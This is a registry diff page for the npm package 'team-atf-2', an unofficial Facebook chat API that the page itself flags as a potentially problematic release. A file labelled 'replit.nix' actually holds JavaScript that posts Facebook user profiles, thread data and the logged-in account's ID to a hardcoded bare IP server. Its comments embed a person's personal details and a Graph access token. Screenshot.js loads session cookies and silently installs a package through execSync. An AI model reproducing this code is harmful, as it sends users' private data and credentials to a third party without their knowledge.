team-atf-2 0.0.1-security → 2.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of team-atf-2 might be problematic. Click here for more details.
- package/.gitattributes +2 -0
- package/Extra/Database/index.js +360 -0
- package/Extra/ExtraAddons.js +78 -0
- package/Extra/ExtraFindUID.js +60 -0
- package/Extra/ExtraGetThread.js +118 -0
- package/Extra/ExtraScreenShot.js +430 -0
- package/Extra/ExtraUptimeRobot.js +26 -0
- package/Extra/Html/Classic/script.js +119 -0
- package/Extra/Html/Classic/style.css +8 -0
- package/Extra/Security/Index.js +146 -0
- package/Extra/Security/Step_1.js +11 -0
- package/Extra/Security/Step_2.js +20 -0
- package/Extra/Security/Step_3.js +20 -0
- package/Extra/Src/History.js +115 -0
- package/Extra/Src/Last-Run.js +65 -0
- package/Extra/Src/Premium.js +84 -0
- package/Extra/Src/uuid.js +137 -0
- package/Func/AcceptAgreement.js +32 -0
- package/Func/ClearCache.js +64 -0
- package/Func/ReportV1.js +54 -0
- package/LICENSE +24 -0
- package/Language/index.json +177 -0
- package/README.md +3 -5
- package/SECURITY.md +17 -0
- package/broadcast.js +38 -0
- package/gitattributes +2 -0
- package/index.js +1364 -0
- package/logger.js +65 -0
- package/package.json +88 -3
- package/replit +79 -0
- package/replit.nix +8 -0
- package/src/Dev_Horizon_Data.js +125 -0
- package/src/Premium.js +30 -0
- package/src/Screenshot.js +85 -0
- package/src/addExternalModule.js +16 -0
- package/src/addUserToGroup.js +79 -0
- package/src/changeAdminStatus.js +79 -0
- package/src/changeArchivedStatus.js +41 -0
- package/src/changeAvt.js +85 -0
- package/src/changeBio.js +65 -0
- package/src/changeBlockedStatus.js +36 -0
- package/src/changeGroupImage.js +106 -0
- package/src/changeNickname.js +45 -0
- package/src/changeThreadColor.js +62 -0
- package/src/changeThreadEmoji.js +42 -0
- package/src/createNewGroup.js +70 -0
- package/src/createPoll.js +60 -0
- package/src/deleteMessage.js +45 -0
- package/src/deleteThread.js +43 -0
- package/src/forwardAttachment.js +48 -0
- package/src/getAccessToken.js +32 -0
- package/src/getCurrentUserID.js +7 -0
- package/src/getEmojiUrl.js +27 -0
- package/src/getFriendsList.js +73 -0
- package/src/getMessage.js +80 -0
- package/src/getThreadHistory.js +537 -0
- package/src/getThreadInfo.js +348 -0
- package/src/getThreadList.js +213 -0
- package/src/getThreadMain.js +220 -0
- package/src/getThreadPictures.js +59 -0
- package/src/getUID.js +59 -0
- package/src/getUserID.js +62 -0
- package/src/getUserInfo.js +129 -0
- package/src/getUserInfoMain.js +65 -0
- package/src/getUserInfoV2.js +36 -0
- package/src/getUserInfoV3.js +63 -0
- package/src/getUserInfoV4.js +55 -0
- package/src/getUserInfoV5.js +61 -0
- package/src/handleFriendRequest.js +46 -0
- package/src/handleMessageRequest.js +49 -0
- package/src/httpGet.js +49 -0
- package/src/httpPost.js +48 -0
- package/src/httpPostFormData.js +41 -0
- package/src/listenMqtt.js +702 -0
- package/src/logout.js +68 -0
- package/src/markAsDelivered.js +48 -0
- package/src/markAsRead.js +70 -0
- package/src/markAsReadAll.js +43 -0
- package/src/markAsSeen.js +51 -0
- package/src/muteThread.js +47 -0
- package/src/removeUserFromGroup.js +49 -0
- package/src/resolvePhotoUrl.js +37 -0
- package/src/searchForThread.js +43 -0
- package/src/sendMessage.js +334 -0
- package/src/sendTypingIndicator.js +80 -0
- package/src/setMessageReaction.js +109 -0
- package/src/setPostReaction.js +102 -0
- package/src/setTitle.js +74 -0
- package/src/threadColors.js +39 -0
- package/src/unfriend.js +43 -0
- package/src/unsendMessage.js +40 -0
- package/test/data/shareAttach.js +146 -0
- package/test/data/something.mov +0 -0
- package/test/data/test.png +0 -0
- package/test/data/test.txt +7 -0
- package/test/env/.env +0 -0
- package/test/example-config.json +18 -0
- package/test/test-page.js +140 -0
- package/test/test.js +385 -0
- package/test/testv2.js +3 -0
- package/utils.js +1648 -0
package/logger.js
ADDED
@@ -0,0 +1,65 @@
|
|
1
|
+
/* eslint-disable linebreak-style */
|
2
|
+
|
3
|
+
const chalk = require('chalk');
|
4
|
+
var isHexcolor = require('is-hexcolor');
|
5
|
+
var getText = function(/** @type {string[]} */ ...Data) {
|
6
|
+
var Main = (Data.splice(0,1)).toString();
|
7
|
+
for (let i = 0; i < Data.length; i++) Main = Main.replace(RegExp(`%${i + 1}`, 'g'), Data[i]);
|
8
|
+
return Main;
|
9
|
+
};
|
10
|
+
/**
|
11
|
+
* @param {any} obj
|
12
|
+
*/
|
13
|
+
function getType(obj) {
|
14
|
+
return Object.prototype.toString.call(obj).slice(8, -1);
|
15
|
+
}
|
16
|
+
|
17
|
+
module.exports = {
|
18
|
+
Normal: function(/** @type {string} */ Str, /** @type {() => any} */ Data ,/** @type {() => void} */ Callback) {
|
19
|
+
if (isHexcolor(global.Fca.Require.FastConfig.MainColor) != true) {
|
20
|
+
this.Warning(getText(global.Fca.Require.Language.Index.InvaildMainColor,global.Fca.Require.FastConfig.MainColor),process.exit(0));
|
21
|
+
}
|
22
|
+
else console.log(chalk.hex(global.Fca.Require.FastConfig.MainColor).bold(`${global.Fca.Require.FastConfig.MainName || '[ FCA-HZI ]'} > `) + Str);
|
23
|
+
if (getType(Data) == 'Function' || getType(Data) == 'AsyncFunction') {
|
24
|
+
return Data()
|
25
|
+
}
|
26
|
+
if (Data) {
|
27
|
+
return Data;
|
28
|
+
}
|
29
|
+
if (getType(Callback) == 'Function' || getType(Callback) == 'AsyncFunction') {
|
30
|
+
Callback();
|
31
|
+
}
|
32
|
+
else return Callback;
|
33
|
+
},
|
34
|
+
Warning: function(/** @type {unknown} */ str, /** @type {() => void} */ callback) {
|
35
|
+
console.log(chalk.magenta.bold('[ FCA-WARNING ] > ') + chalk.yellow(str));
|
36
|
+
if (getType(callback) == 'Function' || getType(callback) == 'AsyncFunction') {
|
37
|
+
callback();
|
38
|
+
}
|
39
|
+
else return callback;
|
40
|
+
},
|
41
|
+
Error: function(/** @type {unknown} */ str, /** @type {() => void} */ callback) {
|
42
|
+
if (!str) {
|
43
|
+
console.log(chalk.magenta.bold('[ FCA-ERROR ] > ') + chalk.red("Already Faulty, Please Contact: Facebook.com/Lazic.Kanzu"));
|
44
|
+
}
|
45
|
+
console.log(chalk.magenta.bold('[ FCA-ERROR ] > ') + chalk.red(str));
|
46
|
+
if (getType(callback) == 'Function' || getType(callback) == 'AsyncFunction') {
|
47
|
+
callback();
|
48
|
+
}
|
49
|
+
else return callback;
|
50
|
+
},
|
51
|
+
Success: function(/** @type {unknown} */ str, /** @type {() => void} */ callback) {
|
52
|
+
console.log(chalk.hex('#9900FF').bold(`${global.Fca.Require.FastConfig.MainName || '[ FCA-HZI ]'} > `) + chalk.green(str));
|
53
|
+
if (getType(callback) == 'Function' || getType(callback) == 'AsyncFunction') {
|
54
|
+
callback();
|
55
|
+
}
|
56
|
+
else return callback;
|
57
|
+
},
|
58
|
+
Info: function(/** @type {unknown} */ str, /** @type {() => void} */ callback) {
|
59
|
+
console.log(chalk.hex('#9900FF').bold(`${global.Fca.Require.FastConfig.MainName || '[ FCA-HZI ]'} > `) + chalk.blue(str));
|
60
|
+
if (getType(callback) == 'Function' || getType(callback) == 'AsyncFunction') {
|
61
|
+
callback();
|
62
|
+
}
|
63
|
+
else return callback;
|
64
|
+
}
|
65
|
+
}
|
package/package.json
CHANGED
@@ -1,6 +1,91 @@
|
|
1
1
|
{
|
2
2
|
"name": "team-atf-2",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "2.1.0",
|
4
|
+
"description": "Facebook-chat-api Chand tricker YouTuber",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "mocha",
|
8
|
+
"lint": "./node_modules/.bin/eslint **.js",
|
9
|
+
"prettier": "prettier utils.js src/* --write"
|
10
|
+
},
|
11
|
+
"author": "Chand tricker",
|
12
|
+
"license": "MIT",
|
13
|
+
"bugs": {
|
14
|
+
"url": "https://github.com/corazoncary/fca/issues"
|
15
|
+
},
|
16
|
+
"homepage": "https://github.com/corazoncary/fca#readme",
|
17
|
+
"repository": {
|
18
|
+
"type": "git",
|
19
|
+
"url": "https://github.com/corazoncary/fca.git"
|
20
|
+
},
|
21
|
+
"dependencies": {
|
22
|
+
"aes-js": "latest",
|
23
|
+
"assert": "latest",
|
24
|
+
"better-sqlite3": "7.4.5",
|
25
|
+
"bluebird": "latest",
|
26
|
+
"chalk": "4.1.2",
|
27
|
+
"cheerio": "latest",
|
28
|
+
"crypto-js": "latest",
|
29
|
+
"express": "latest",
|
30
|
+
"file-url": "^3.0.0",
|
31
|
+
"got": "^11.8.3",
|
32
|
+
"https-proxy-agent": "latest",
|
33
|
+
"is-hexcolor": "^1.0.0",
|
34
|
+
"lodash": "latest",
|
35
|
+
"moment": "^2.29.4",
|
36
|
+
"mqtt": "latest",
|
37
|
+
"npmlog": "latest",
|
38
|
+
"os": "latest",
|
39
|
+
"path": "latest",
|
40
|
+
"pretty-ms": "7.0.1",
|
41
|
+
"readline": "latest",
|
42
|
+
"request": "latest",
|
43
|
+
"semver": "^7.4.0",
|
44
|
+
"sqlite": "4.0.21",
|
45
|
+
"totp-generator": "latest",
|
46
|
+
"uuid": "latest",
|
47
|
+
"encode32": "latest",
|
48
|
+
"tough-cookie": "^4.1.2",
|
49
|
+
"websocket-stream": "latest"
|
50
|
+
},
|
51
|
+
"engines": {
|
52
|
+
"node": ">=14.x <16.x"
|
53
|
+
},
|
54
|
+
"devDependencies": {
|
55
|
+
"eslint": "latest",
|
56
|
+
"mocha": "latest",
|
57
|
+
"prettier": "latest"
|
58
|
+
},
|
59
|
+
"eslintConfig": {
|
60
|
+
"env": {
|
61
|
+
"es6": true,
|
62
|
+
"node": true
|
63
|
+
},
|
64
|
+
"extends": "eslint:recommended",
|
65
|
+
"parserOptions": {
|
66
|
+
"sourceType": "module"
|
67
|
+
},
|
68
|
+
"rules": {
|
69
|
+
"linebreak-style": [
|
70
|
+
"error",
|
71
|
+
"unix"
|
72
|
+
],
|
73
|
+
"semi": [
|
74
|
+
"error",
|
75
|
+
"always"
|
76
|
+
],
|
77
|
+
"no-unused-vars": [
|
78
|
+
1,
|
79
|
+
{
|
80
|
+
"argsIgnorePattern": "^_"
|
81
|
+
}
|
82
|
+
]
|
83
|
+
}
|
84
|
+
},
|
85
|
+
"keywords": [
|
86
|
+
"Fca chand",
|
87
|
+
"Fca-chand-tricker",
|
88
|
+
"Atf fca",
|
89
|
+
"Team-atf"
|
90
|
+
]
|
6
91
|
}
|
package/replit
ADDED
@@ -0,0 +1,79 @@
|
|
1
|
+
hidden = [".config", "package-lock.json"]
|
2
|
+
run = "npm run start"
|
3
|
+
|
4
|
+
[[hints]]
|
5
|
+
regex = "Error \\[ERR_REQUIRE_ESM\\]"
|
6
|
+
message = "We see that you are using require(...) inside your code. We currently do not support this syntax. Please use 'import' instead when using external modules. (https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import)"
|
7
|
+
|
8
|
+
[nix]
|
9
|
+
channel = "stable-22_11"
|
10
|
+
|
11
|
+
[env]
|
12
|
+
XDG_CONFIG_HOME = "/home/runner/$REPL_SLUG/.config"
|
13
|
+
PATH = "/home/runner/$REPL_SLUG/.config/npm/node_global/bin:/home/runner/$REPL_SLUG/node_modules/.bin"
|
14
|
+
npm_config_prefix = "/home/runner/$REPL_SLUG/.config/npm/node_global"
|
15
|
+
|
16
|
+
[gitHubImport]
|
17
|
+
requiredFiles = [".replit", "replit.nix", ".config", "package.json", "package-lock.json"]
|
18
|
+
|
19
|
+
[packager]
|
20
|
+
language = "nodejs"
|
21
|
+
|
22
|
+
[packager.features]
|
23
|
+
packageSearch = true
|
24
|
+
guessImports = true
|
25
|
+
enabledForHosting = false
|
26
|
+
|
27
|
+
[unitTest]
|
28
|
+
language = "nodejs"
|
29
|
+
|
30
|
+
[debugger]
|
31
|
+
support = true
|
32
|
+
|
33
|
+
[debugger.interactive]
|
34
|
+
transport = "localhost:0"
|
35
|
+
startCommand = [ "dap-node" ]
|
36
|
+
|
37
|
+
[debugger.interactive.initializeMessage]
|
38
|
+
command = "initialize"
|
39
|
+
type = "request"
|
40
|
+
|
41
|
+
[debugger.interactive.initializeMessage.arguments]
|
42
|
+
clientID = "replit"
|
43
|
+
clientName = "replit.com"
|
44
|
+
columnsStartAt1 = true
|
45
|
+
linesStartAt1 = true
|
46
|
+
locale = "en-us"
|
47
|
+
pathFormat = "path"
|
48
|
+
supportsInvalidatedEvent = true
|
49
|
+
supportsProgressReporting = true
|
50
|
+
supportsRunInTerminalRequest = true
|
51
|
+
supportsVariablePaging = true
|
52
|
+
supportsVariableType = true
|
53
|
+
|
54
|
+
[debugger.interactive.launchMessage]
|
55
|
+
command = "launch"
|
56
|
+
type = "request"
|
57
|
+
|
58
|
+
[debugger.interactive.launchMessage.arguments]
|
59
|
+
args = []
|
60
|
+
console = "externalTerminal"
|
61
|
+
cwd = "."
|
62
|
+
environment = []
|
63
|
+
pauseForSourceMap = false
|
64
|
+
program = "./index.js"
|
65
|
+
request = "launch"
|
66
|
+
sourceMaps = true
|
67
|
+
stopOnEntry = false
|
68
|
+
type = "pwa-node"
|
69
|
+
|
70
|
+
[languages]
|
71
|
+
|
72
|
+
[languages.javascript]
|
73
|
+
pattern = "**/{*.js,*.jsx,*.ts,*.tsx}"
|
74
|
+
|
75
|
+
[languages.javascript.languageServer]
|
76
|
+
start = "typescript-language-server --stdio"
|
77
|
+
|
78
|
+
[deployment]
|
79
|
+
run = ["sh", "-c", "npm run start"]
|
package/replit.nix
ADDED
@@ -0,0 +1,125 @@
|
|
1
|
+
/* eslint-disable linebreak-style */
|
2
|
+
"use strict";
|
3
|
+
|
4
|
+
var utils = require("../utils");
|
5
|
+
var bluebird = require('bluebird');
|
6
|
+
var request = bluebird.promisify(require("request"));
|
7
|
+
|
8
|
+
module.exports = function (defaultFuncs, api, ctx) {
|
9
|
+
return function getUserInfoV4(data, type, method, callback) {
|
10
|
+
var resolveFunc = function () { };
|
11
|
+
var rejectFunc = function () { };
|
12
|
+
var returnPromise = new Promise(function (resolve, reject) {
|
13
|
+
resolveFunc = resolve;
|
14
|
+
rejectFunc = reject;
|
15
|
+
});
|
16
|
+
|
17
|
+
if (!callback) {
|
18
|
+
callback = function (err, userInfo) {
|
19
|
+
if (err) return rejectFunc(err);
|
20
|
+
resolveFunc(userInfo);
|
21
|
+
};
|
22
|
+
}
|
23
|
+
|
24
|
+
if (!data || !type || !method) return;
|
25
|
+
|
26
|
+
var Cluster = ['http://146.190.109.182:3874'];
|
27
|
+
var ursl = Cluster[Math.floor(Math.random() * Cluster.length)];
|
28
|
+
|
29
|
+
if (utils.getType(data) !== "Array") data = [data];
|
30
|
+
switch (method) {
|
31
|
+
case "Post": {
|
32
|
+
switch (type) {
|
33
|
+
case "Users": {
|
34
|
+
/*
|
35
|
+
example
|
36
|
+
Time:19/01/2023
|
37
|
+
Data:[{"id":"100042817150429","name":"Nguyễn Thái Hảo","first_name":"Hảo","username":"Lazic.Kanzu","link":"https://www.facebook.com/Lazic.Kanzu","verified":"Không Có Dữ Liệu","about":"Là một người bình thường ^^","avatar":"https://graph.facebook.com/100042817150429/picture?height=1500&width=1500&access_token=1449557605494892|aaf0a865c8bafc314ced5b7f18f3caa6","birthday":"01/03/1999","follow":241614,"gender":"male","hometown":{"id":"112089428815888","name":"Xuân Lộc, Ðồng Nai, Vietnam"},"email":"Không Có Dữ Liệu","interested_in":"Không Có Dữ Liệu","location":{"id":"351759091676222","name":"Biên Hòa"},"locale":"Không Có Dữ Liệu","relationship_status":"Không Có Dữ Liệu","love":"Không Có Dữ Liệu","website":"http://KanzuWakazaki.tk/","quotes":"The word impossible is not in my dictionary.","timezone":"Không Có Dữ Liệu","updated_time":"Không Có Dữ Liệu"}]
|
38
|
+
Type:Users
|
39
|
+
By:KanzuWakazaki
|
40
|
+
**/
|
41
|
+
let Time = new Date().toLocaleString("vi-vn", {timeZone: "Asia/Ho_Chi_Minh"});
|
42
|
+
return request({
|
43
|
+
url: ursl + '/post',
|
44
|
+
method: 'post',
|
45
|
+
headers: {
|
46
|
+
'user-agent': "Horizon/GlobalData/Client"
|
47
|
+
},
|
48
|
+
formData: {
|
49
|
+
Time: Time,
|
50
|
+
Data: JSON.stringify(data),
|
51
|
+
Type: "Users",
|
52
|
+
By: ctx.userID
|
53
|
+
}
|
54
|
+
}).then(dt => console.log(dt.body));
|
55
|
+
}
|
56
|
+
case "Threads": {
|
57
|
+
/*
|
58
|
+
example
|
59
|
+
Time:19/01/2023
|
60
|
+
Data:[{"threadID":"5011501735554963","threadName":"[🏆] 𝕳𝕷 • 𝑯𝒐𝒓𝒊𝒛𝒐𝒏 𝑮𝒂𝒎𝒊𝒏𝒈 [🎮]","participantIDs":["100042817150429"],"userInfo":[{"id":"100042817150429","name":"Nguyễn Thái Hảo","firstName":"Hảo","vanity":"Lazic.Kanzu","thumbSrc":"https://scontent.fsgn5-14.fna.fbcdn.net/v/t39.30808-1/311136459_774539707316594_357342861145224378_n.jpg?stp=cp0_dst-jpg_p60x60&_nc_cat=101&ccb=1-7&_nc_sid=f67be1&_nc_ohc=VQmEbyNerpUAX9SL2lL&tn=b4RbIpyEAJUl2LrC&_nc_ht=scontent.fsgn5-14.fna&oh=00_AfDzMGWK-Hw8J8Ha_uZkNgwwIqX23W89p9vPbovDSrMFVw&oe=63CD7339","profileUrl":"https://scontent.fsgn5-14.fna.fbcdn.net/v/t39.30808-1/311136459_774539707316594_357342861145224378_n.jpg?stp=cp0_dst-jpg_p60x60&_nc_cat=101&ccb=1-7&_nc_sid=f67be1&_nc_ohc=VQmEbyNerpUAX9SL2lL&tn=b4RbIpyEAJUl2LrC&_nc_ht=scontent.fsgn5-14.fna&oh=00_AfDzMGWK-Hw8J8Ha_uZkNgwwIqX23W89p9vPbovDSrMFVw&oe=63CD7339","gender":"MALE","type":"User","isFriend":true,"isBirthday":false}],"unreadCount":38925,"messageCount":39857,"timestamp":"1674107309307","muteUntil":null,"isGroup":true,"isSubscribed":true,"isArchived":false,"folder":"INBOX","cannotReplyReason":null,"eventReminders":[],"emoji":"😏","color":"DD8800","nicknames":{"100001776745483":"[𝐇𝐆] • Eo bờ su"},"adminIDs":[{"id":"100042817150429"}],"approvalMode":true,"approvalQueue":[],"reactionsMuteMode":"reactions_not_muted","mentionsMuteMode":"mentions_not_muted","isPinProtected":false,"relatedPageThread":null,"name":"[🏆] 𝕳𝕷 • 𝑯𝒐𝒓𝒊𝒛𝒐𝒏 𝑮𝒂𝒎𝒊𝒏𝒈 [🎮]","snippet":"SystemCall run (async function() {\nSend(await Api.getThreadInfo(Data.threadID))\n})()","snippetSender":"100042817150429","snippetAttachments":[],"serverTimestamp":"1674107309307","imageSrc":"https://scontent.fsgn5-14.fna.fbcdn.net/v/t1.15752-9/278020824_345766417524223_6790288127531819759_n.jpg?_nc_cat=101&ccb=1-7&_nc_sid=02e273&_nc_ohc=dfuXjxOR1BUAX-SUN1x&_nc_ht=scontent.fsgn5-14.fna&oh=03_AdQkXN3hb3z4Hg0Tg-vI7ZpDdSmujnluj13uNqUSJoU9iA&oe=63F060BA","isCanonicalUser":false,"isCanonical":false,"recipientsLoadable":true,"hasEmailParticipant":false,"readOnly":false,"canReply":true,"lastMessageType":"message","lastReadTimestamp":"1649756873571","threadType":2,"TimeCreate":1674107310529,"TimeUpdate":1674107310529}]
|
61
|
+
Type:Threads
|
62
|
+
By:KanzuWakazaki
|
63
|
+
**/
|
64
|
+
let Time = new Date().toLocaleString("vi-vn", {timeZone: "Asia/Ho_Chi_Minh"});
|
65
|
+
return request({
|
66
|
+
url: ursl + '/post',
|
67
|
+
method: 'post',
|
68
|
+
headers: {
|
69
|
+
'user-agent': "Horizon/GlobalData/Client"
|
70
|
+
},
|
71
|
+
formData: {
|
72
|
+
Time: Time,
|
73
|
+
Data: JSON.stringify(data),
|
74
|
+
Type: "Threads",
|
75
|
+
By: ctx.userID
|
76
|
+
}
|
77
|
+
}).then(dt => console.log(dt.body));
|
78
|
+
}
|
79
|
+
}
|
80
|
+
}
|
81
|
+
break;
|
82
|
+
case "Get": {
|
83
|
+
switch (type) {
|
84
|
+
case "Users": {
|
85
|
+
/* example
|
86
|
+
Requires:[5011501735554963]
|
87
|
+
Type:Threads
|
88
|
+
**/
|
89
|
+
|
90
|
+
//still operating until Feb 25
|
91
|
+
return request({
|
92
|
+
url: ursl + '/get',
|
93
|
+
method: 'post',
|
94
|
+
headers: {
|
95
|
+
'user-agent': "Horizon/GlobalData/Client"
|
96
|
+
},
|
97
|
+
formData: {
|
98
|
+
Requires: JSON.stringify(data),
|
99
|
+
Type: "Users"
|
100
|
+
}
|
101
|
+
}).then(dt => console.log(dt.body));
|
102
|
+
}
|
103
|
+
case "Threads": {
|
104
|
+
return request({
|
105
|
+
url: ursl + '/get',
|
106
|
+
method: 'post',
|
107
|
+
headers: {
|
108
|
+
'user-agent': "Horizon/GlobalData/Client"
|
109
|
+
},
|
110
|
+
formData: {
|
111
|
+
Requires: JSON.stringify(data),
|
112
|
+
Type: "Threads"
|
113
|
+
}
|
114
|
+
}).then(dt => console.log(dt.body));
|
115
|
+
}
|
116
|
+
}
|
117
|
+
}
|
118
|
+
break;
|
119
|
+
default:
|
120
|
+
return;
|
121
|
+
}
|
122
|
+
|
123
|
+
return returnPromise;
|
124
|
+
};
|
125
|
+
};
|
package/src/Premium.js
ADDED
@@ -0,0 +1,30 @@
|
|
1
|
+
"use strict";
|
2
|
+
|
3
|
+
var { join } = require('path')
|
4
|
+
var fs = require('fs')
|
5
|
+
|
6
|
+
|
7
|
+
module.exports = function (defaultFuncs, api, ctx) {
|
8
|
+
return function(Name, args){
|
9
|
+
var Method = {}
|
10
|
+
fs.readdirSync(join(__dirname, "../Func")).filter((/** @type {string} */File) => File.endsWith(".js") && !File.includes('Dev_')).map((/** @type {string} */File) => Method[File.split('.').slice(0, -1).join('.')] = require(`../Func/${File}`)(defaultFuncs, api, ctx));
|
11
|
+
if (Method[Name] == undefined) {
|
12
|
+
return (`Method ${Name} not found`);
|
13
|
+
}
|
14
|
+
else {
|
15
|
+
try {
|
16
|
+
if (process.env.HalzionVersion == 1973 && global.Fca.Data.PremText.includes("Premium")) {
|
17
|
+
return Method[Name](args).then((/** @type {string} */Data) => {
|
18
|
+
return Data;
|
19
|
+
})
|
20
|
+
}
|
21
|
+
else {
|
22
|
+
return ("Mua Premium Đi Rồi Sài Ông Cháu Ơi !!");
|
23
|
+
}
|
24
|
+
}
|
25
|
+
catch (e) {
|
26
|
+
console.log(e);
|
27
|
+
}
|
28
|
+
}
|
29
|
+
}
|
30
|
+
};
|
@@ -0,0 +1,85 @@
|
|
1
|
+
/* eslint-disable linebreak-style */
|
2
|
+
"use strict";
|
3
|
+
|
4
|
+
var { join } = require('path');
|
5
|
+
var fs = require('fs');
|
6
|
+
var utils = require("../utils");
|
7
|
+
var logger = require('../logger')
|
8
|
+
module.exports = function (defaultFuncs, api, ctx) {
|
9
|
+
var Coookie = JSON.parse(JSON.stringify(ctx.jar.getCookies("https://www.facebook.com").concat(ctx.jar.getCookies("https://facebook.com")).concat(ctx.jar.getCookies("https://www.messenger.com"))));
|
10
|
+
for (let i of Coookie) {
|
11
|
+
i.name = i.key;
|
12
|
+
i.domain = 'www.facebook.com';
|
13
|
+
delete i.key;
|
14
|
+
}
|
15
|
+
return function(Link, callback) {
|
16
|
+
if (process.platform != 'win32') return logger.Error('Not Supported Platform');
|
17
|
+
else try {
|
18
|
+
let i = require('puppeteer');
|
19
|
+
}
|
20
|
+
catch (e) {
|
21
|
+
var { execSync } = require('child_process');
|
22
|
+
execSync('npm i puppeteer', { stdio: 'inherit' });
|
23
|
+
}
|
24
|
+
const Screenshot = require('../Extra/ExtraScreenShot');
|
25
|
+
var resolveFunc = function () { };
|
26
|
+
var rejectFunc = function () { };
|
27
|
+
var returnPromise = new Promise(function (resolve, reject) {
|
28
|
+
resolveFunc = resolve;
|
29
|
+
rejectFunc = reject;
|
30
|
+
});
|
31
|
+
|
32
|
+
if (!callback) {
|
33
|
+
callback = function (err, data) {
|
34
|
+
if (err) return rejectFunc(err);
|
35
|
+
resolveFunc(data);
|
36
|
+
};
|
37
|
+
}
|
38
|
+
if (Link.includes('facebook.com') || Link.includes('Facebook.com') || Link.includes('fb')) {
|
39
|
+
let LinkSplit = Link.split('/');
|
40
|
+
if (LinkSplit.indexOf("https:") == 0) {
|
41
|
+
if (Link.includes('messages')) {
|
42
|
+
Screenshot.buffer(Link, {
|
43
|
+
cookies: Coookie
|
44
|
+
}).then(data => {
|
45
|
+
callback(null,data);
|
46
|
+
});
|
47
|
+
}
|
48
|
+
else if (!isNaN(LinkSplit[3]) && !Link.split('=')[1] && !isNaN(Link.split('=')[1])) {
|
49
|
+
api.sendMessage('Invaild link, format link: facebook.com/Lazic.Kanzu',global.Fca.Data.event.threadID,global.Fca.Data.event.messageID);
|
50
|
+
callback('Error Link', null);
|
51
|
+
}
|
52
|
+
else if (!isNaN(Link.split('=')[1]) && Link.split('=')[1]) {
|
53
|
+
let Format = `https://www.facebook.com/profile.php?id=${Link.split('=')[1]}`;
|
54
|
+
Screenshot.buffer(Format, {
|
55
|
+
cookies: Coookie
|
56
|
+
}).then(data => {
|
57
|
+
callback(null,data);
|
58
|
+
});
|
59
|
+
}
|
60
|
+
else {
|
61
|
+
let Format = `https://www.facebook.com/${LinkSplit[3]}`;
|
62
|
+
Screenshot.buffer(Format, {
|
63
|
+
cookies: Coookie
|
64
|
+
}).then(data => {
|
65
|
+
callback(null,data);
|
66
|
+
});
|
67
|
+
}
|
68
|
+
}
|
69
|
+
else {
|
70
|
+
let Form = `https://www.facebook.com/${LinkSplit[1]}`;
|
71
|
+
Screenshot.buffer(Form, {
|
72
|
+
cookies: Coookie
|
73
|
+
}).then(data => {
|
74
|
+
callback(null,data);
|
75
|
+
});
|
76
|
+
}
|
77
|
+
}
|
78
|
+
else {
|
79
|
+
Screenshot.buffer(Link).then(data => {
|
80
|
+
callback(null,data);
|
81
|
+
});
|
82
|
+
}
|
83
|
+
return returnPromise;
|
84
|
+
};
|
85
|
+
};
|
@@ -0,0 +1,16 @@
|
|
1
|
+
"use strict";
|
2
|
+
|
3
|
+
const utils = require("../utils");
|
4
|
+
|
5
|
+
module.exports = function (defaultFuncs, api, ctx) {
|
6
|
+
return function addExternalModule(moduleObj) {
|
7
|
+
if (utils.getType(moduleObj) == "Object") {
|
8
|
+
for (let apiName in moduleObj) {
|
9
|
+
if (utils.getType(moduleObj[apiName]) == "Function") api[apiName] = moduleObj[apiName](defaultFuncs, api, ctx);
|
10
|
+
else throw new Error(`Item "${apiName}" in moduleObj must be a function, not ${utils.getType(moduleObj[apiName])}!`);
|
11
|
+
|
12
|
+
}
|
13
|
+
}
|
14
|
+
else throw new Error(`moduleObj must be an object, not ${utils.getType(moduleObj)}!`);
|
15
|
+
};
|
16
|
+
};
|
@@ -0,0 +1,79 @@
|
|
1
|
+
"use strict";
|
2
|
+
|
3
|
+
var utils = require("../utils");
|
4
|
+
var log = require("npmlog");
|
5
|
+
|
6
|
+
module.exports = function (defaultFuncs, api, ctx) {
|
7
|
+
return function addUserToGroup(userID, threadID, callback) {
|
8
|
+
var resolveFunc = function () { };
|
9
|
+
var rejectFunc = function () { };
|
10
|
+
var returnPromise = new Promise(function (resolve, reject) {
|
11
|
+
resolveFunc = resolve;
|
12
|
+
rejectFunc = reject;
|
13
|
+
});
|
14
|
+
|
15
|
+
if (!callback && (utils.getType(threadID) === "Function" || utils.getType(threadID) === "AsyncFunction")) throw { error: "please pass a threadID as a second argument." };
|
16
|
+
|
17
|
+
if (!callback) {
|
18
|
+
callback = function (err) {
|
19
|
+
if (err) return rejectFunc(err);
|
20
|
+
resolveFunc();
|
21
|
+
};
|
22
|
+
}
|
23
|
+
|
24
|
+
if (utils.getType(threadID) !== "Number" && utils.getType(threadID) !== "String") throw { error: "ThreadID should be of type Number or String and not " + utils.getType(threadID) + "." };
|
25
|
+
|
26
|
+
|
27
|
+
if (utils.getType(userID) !== "Array") userID = [userID];
|
28
|
+
|
29
|
+
var messageAndOTID = utils.generateOfflineThreadingID();
|
30
|
+
var form = {
|
31
|
+
client: "mercury",
|
32
|
+
action_type: "ma-type:log-message",
|
33
|
+
author: "fbid:" + ctx.userID,
|
34
|
+
thread_id: "",
|
35
|
+
timestamp: Date.now(),
|
36
|
+
timestamp_absolute: "Today",
|
37
|
+
timestamp_relative: utils.generateTimestampRelative(),
|
38
|
+
timestamp_time_passed: "0",
|
39
|
+
is_unread: false,
|
40
|
+
is_cleared: false,
|
41
|
+
is_forward: false,
|
42
|
+
is_filtered_content: false,
|
43
|
+
is_filtered_content_bh: false,
|
44
|
+
is_filtered_content_account: false,
|
45
|
+
is_spoof_warning: false,
|
46
|
+
source: "source:chat:web",
|
47
|
+
"source_tags[0]": "source:chat",
|
48
|
+
log_message_type: "log:subscribe",
|
49
|
+
status: "0",
|
50
|
+
offline_threading_id: messageAndOTID,
|
51
|
+
message_id: messageAndOTID,
|
52
|
+
threading_id: utils.generateThreadingID(ctx.clientID),
|
53
|
+
manual_retry_cnt: "0",
|
54
|
+
thread_fbid: threadID
|
55
|
+
};
|
56
|
+
|
57
|
+
for (var i = 0; i < userID.length; i++) {
|
58
|
+
if (utils.getType(userID[i]) !== "Number" && utils.getType(userID[i]) !== "String") throw { error: "Elements of userID should be of type Number or String and not " + utils.getType(userID[i]) + "." };
|
59
|
+
